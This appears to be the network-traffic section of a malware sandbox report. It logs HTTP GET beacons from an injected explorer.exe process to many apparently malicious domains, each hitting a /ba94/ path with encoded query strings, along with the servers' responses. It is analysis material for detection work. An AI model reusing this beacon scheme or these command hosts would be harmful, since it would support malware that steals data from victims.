                                                                                            Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.44976481.88.63.46802580C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:16:02.495913029 CEST172OUTGET /ba94/?GBZD=NXkDk&pratfT=9CJNXj5uQbOHs/77np+eO8Q/ISwnRwOD9dL+vmc89B+vdAeoHvCu+AGFKsv90xv/+oBs HTTP/1.1
                                                                                            Host: www.spesandosupermercato.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:16:02.679224968 CEST367INHTTP/1.1 404 Not Found
                                                                                            Date: Fri, 03 May 2024 11:16:02 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 203
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 62 61 39 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ba94/ was not found on this server.</p></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.44976587.236.19.19802580C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:16:25.590027094 CEST162OUTGET /ba94/?pratfT=V1aFg5/hXDFl5wxQkOdKdQO0zYf9SBLxp/cCrsPO65GW9uG2gx9SN3pJ7wRbQ/9OJgNQ&GBZD=NXkDk HTTP/1.1
                                                                                            Host: www.prismotrov.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:16:25.819972038 CEST481INHTTP/1.1 404 Not Found
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Fri, 03 May 2024 11:16:25 GMT
                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                            Content-Length: 278
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 72 69 73 6d 6f 74 72 6f 76 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.prismotrov.com Port 80</address></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449766185.215.4.42802580C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:16:47.256119013 CEST164OUTGET /ba94/?GBZD=NXkDk&pratfT=kXF/Fpa8v+JTS5PsBltBPJxSCgH9lcjpw4nakXkU6jr7KNfYEJ0DgTlAXzuMbnXutgFh HTTP/1.1
                                                                                            Host: www.reddragondao.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:16:47.519891024 CEST846INHTTP/1.1 301 Moved Permanently
                                                                                            Server: ddos-guard
                                                                                            Connection: close
                                                                                            Set-Cookie: __ddg1_=wEspyByY5BD5YibjVulR; Domain=.reddragondao.com; HttpOnly; Path=/; Expires=Sat, 03-May-2025 11:16:47 GMT
                                                                                            Date: Fri, 03 May 2024 11:16:47 GMT
                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                            Content-Length: 333
                                                                                            Location: https://www.reddragondao.com/ba94/?GBZD=NXkDk&pratfT=kXF/Fpa8v+JTS5PsBltBPJxSCgH9lcjpw4nakXkU6jr7KNfYEJ0DgTlAXzuMbnXutgFh
                                                                                            X-Host: www.reddragondao.com
                                                                                            cache-control: max-age=0
                                                                                            cache-control: public
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 64 64 72 61 67 6f 6e 64 61 6f 2e 63 6f 6d 2f 62 61 39 34 2f 3f 47 42 5a 44 3d 4e 58 6b 44 6b 26 61 6d 70 3b 70 72 61 74 66 54 3d 6b 58 46 2f 46 70 61 38 76 2b 4a 54 53 35 50 73 42 6c 74 42 50 4a 78 53 43 67 48 39 6c 63 6a 70 77 34 6e 61 6b 58 6b 55 36 6a 72 37 4b 4e 66 59 45 4a 30 44 67 54 6c 41 58 7a 75 4d 62 6e 58 75 74 67 46 68 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.reddragondao.com/ba94/?GBZD=NXkDk&amp;pratfT=kXF/Fpa8v+JTS5PsBltBPJxSCgH9lcjpw4nakXkU6jr7KNfYEJ0DgTlAXzuMbnXutgFh">here</a>.</p></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.44976791.195.240.19802580C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:17:09.040524006 CEST166OUTGET /ba94/?pratfT=yJmYWNcKPkPtIy8MmdQ6Jiv3GM37Mbq/xRlQ2B+NvdwqTGgi38pJAJwinC316KK/NRcT&GBZD=NXkDk HTTP/1.1
                                                                                            Host: www.yourreicapital.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:17:09.219379902 CEST208INHTTP/1.1 403 Forbidden
                                                                                            content-length: 93
                                                                                            cache-control: no-cache
                                                                                            content-type: text/html
                                                                                            connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.449768199.59.243.225802580C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:17:49.792171955 CEST158OUTGET /ba94/?pratfT=W24/dTX+nhrci6xk5Vrz5exadXl75jzXfJ/PTNyhNxkzHtpDGR8LH25TWT7FyDO/Clqj&GBZD=NXkDk HTTP/1.1
                                                                                            Host: www.arwile.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:17:49.896282911 CEST1200INHTTP/1.1 200 OK
                                                                                            date: Fri, 03 May 2024 11:17:49 GMT
                                                                                            content-type: text/html; charset=utf-8
                                                                                            content-length: 1310
                                                                                            x-request-id: 13e55180-6a2c-4bd8-b0e5-11b419fb7530
                                                                                            cache-control: no-store, max-age=0
                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Rr522s/GhwVxCBHRUijaeYUbYbhPw9j6Cc58GorRPrGlkVOPcodECZAGKGDkDOGnPrnZ6QZar+ogiP7ukdtMJQ==
                                                                                            set-cookie: parking_session=13e55180-6a2c-4bd8-b0e5-11b419fb7530; expires=Fri, 03 May 2024 11:32:49 GMT; path=/
                                                                                            connection: close
                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 72 35 32 32 73 2f 47 68 77 56 78 43 42 48 52 55 69 6a 61 65 59 55 62 59 62 68 50 77 39 6a 36 43 63 35 38 47 6f 72 52 50 72 47 6c 6b 56 4f 50 63 6f 64 45 43 5a 41 47 4b 47 44 6b 44 4f 47 6e 50 72 6e 5a 36 51 5a 61 72 2b 6f 67 69 50 37 75 6b 64 74 4d 4a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Rr522s/GhwVxCBHRUijaeYUbYbhPw9j6Cc58GorRPrGlkVOPcodECZAGKGDkDOGnPrnZ6QZar+ogiP7ukdtMJQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                                                            May 3, 2024 13:17:49.896301985 CEST799INData Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                                                            Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTNlNTUxODAtNmEyYy00YmQ4LWIwZTUtMTFiNDE5Zm


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.449770199.15.163.139802580C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:18:53.201198101 CEST166OUTGET /ba94/?GBZD=NXkDk&pratfT=vEs481tzZ8uFFz1k+6tD8QeHPKaYlxkaaGxgpMrHuLeAI0f7GnjxFz6KVAN2+SMq8cuW HTTP/1.1
                                                                                            Host: www.galaxyprofituk.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:18:53.295715094 CEST154INHTTP/1.0 302 Moved Temporarily
                                                                                            Location: https://www.expiredwixdomain.com/?redirectedFor=www.galaxyprofituk.com
                                                                                            Connection: close
                                                                                            Content-Length: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.44977181.19.154.98802580C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:19:52.944032907 CEST160OUTGET /ba94/?pratfT=/5mX1cVAfY0ri4HH88Kr/U1YVAUiaH/OilYzSWrvtRaeMzOYw8luwtxtoaBngH3r6SVW&GBZD=NXkDk HTTP/1.1
                                                                                            Host: www.naservus.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:19:53.167144060 CEST746INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.20.1
                                                                                            Date: Fri, 03 May 2024 11:19:53 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Data Raw: 32 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 66 61 75 6c 74 70 61 67 65 2e 77 6f 72 6c 64 34 79 6f 75 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 70 61 67 65 2f 63 73 73 2f 65 6d 62 65 64 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 73 72 [TRUNCATED]
                                                                                            Data Ascii: 239<!DOCTYPE html><html lang="de"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <title></title> <link rel="stylesheet" href="https://defaultpage.world4you.com/parkingpage/css/embed.css"></head><body><script src="https://defaultpage.world4you.com/parkingpage/js/embed.js"></script><noscript>This site requires JavaScript to work. Please enable JavaScript in your browser or use a browser with JavaScript support.</noscript></body></html>0


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            10192.168.2.449772203.161.58.6580
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:20:54.448925972 CEST157OUTGET /ba94/?pratfT=mmOyuuDxanDGJ/az8het+friGOz3k1SnavH/ohZYGmJSLkloT3wLmzxJIbhk88Ns12zj&E6Ap=B2JhxD HTTP/1.1
                                                                                            Host: www.hjgd.xyz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:20:54.769840956 CEST454INHTTP/1.1 404 Not Found
                                                                                            Date: Fri, 03 May 2024 11:20:54 GMT
                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                            Content-Length: 274
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 6a 67 64 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.hjgd.xyz Port 80</address></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            11192.168.2.44977381.19.154.9880
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:21:15.044040918 CEST161OUTGET /ba94/?pratfT=/5mX1cVAfY0ri4HH88Kr/U1YVAUiaH/OilYzSWrvtRaeMzOYw8luwtxtoaBngH3r6SVW&E6Ap=B2JhxD HTTP/1.1
                                                                                            Host: www.naservus.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:21:15.259886980 CEST746INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.20.1
                                                                                            Date: Fri, 03 May 2024 11:21:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Data Raw: 32 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 66 61 75 6c 74 70 61 67 65 2e 77 6f 72 6c 64 34 79 6f 75 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 70 61 67 65 2f 63 73 73 2f 65 6d 62 65 64 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 73 72 [TRUNCATED]
                                                                                            Data Ascii: 239<!DOCTYPE html><html lang="de"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <title></title> <link rel="stylesheet" href="https://defaultpage.world4you.com/parkingpage/css/embed.css"></head><body><script src="https://defaultpage.world4you.com/parkingpage/js/embed.js"></script><noscript>This site requires JavaScript to work. Please enable JavaScript in your browser or use a browser with JavaScript support.</noscript></body></html>0


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            12192.168.2.44977489.117.27.19880
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:21:35.663952112 CEST159OUTGET /ba94/?pratfT=mqF7ecV0fTrt7RumtuPBWgaPRte4eeCjTo6sX4dmZEZ1SPnDloKMCAAIcJIupYJjrOQM&E6Ap=B2JhxD HTTP/1.1
                                                                                            Host: www.dxtra.shop
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:21:36.000741959 CEST1151INHTTP/1.1 301 Moved Permanently
                                                                                            Connection: close
                                                                                            content-type: text/html
                                                                                            content-length: 795
                                                                                            date: Fri, 03 May 2024 11:21:35 GMT
                                                                                            server: LiteSpeed
                                                                                            location: https://www.dxtra.shop/ba94/?pratfT=mqF7ecV0fTrt7RumtuPBWgaPRte4eeCjTo6sX4dmZEZ1SPnDloKMCAAIcJIupYJjrOQM&E6Ap=B2JhxD
                                                                                            platform: hostinger
                                                                                            content-security-policy: upgrade-insecure-requests
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            13192.168.2.4497753.33.130.19080
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:21:55.842360020 CEST168OUTGET /ba94/?pratfT=EPgCOY9cvZq7qozCRkZFGMl16i9BJA11xMSrv9iq5fczmqSZt0yo+vxnS1dzo2vm21b4&E6Ap=B2JhxD HTTP/1.1
                                                                                            Host: www.thesiamesebetta.biz
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:21:55.938246965 CEST342INHTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Fri, 03 May 2024 11:21:55 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 202
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 72 61 74 66 54 3d 45 50 67 43 4f 59 39 63 76 5a 71 37 71 6f 7a 43 52 6b 5a 46 47 4d 6c 31 36 69 39 42 4a 41 31 31 78 4d 53 72 76 39 69 71 35 66 63 7a 6d 71 53 5a 74 30 79 6f 2b 76 78 6e 53 31 64 7a 6f 32 76 6d 32 31 62 34 26 45 36 41 70 3d 42 32 4a 68 78 44 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pratfT=EPgCOY9cvZq7qozCRkZFGMl16i9BJA11xMSrv9iq5fczmqSZt0yo+vxnS1dzo2vm21b4&E6Ap=B2JhxD"}</script></head></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            14192.168.2.449776103.224.212.21780
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:22:16.535005093 CEST169OUTGET /ba94/?pratfT=iolsKzgpZ1NBt3juMfuMhkrDq6b7TDA/46a7L9Ma3wfGSQPZnAxkRO739civO1GZyrJ6&E6Ap=B2JhxD HTTP/1.1
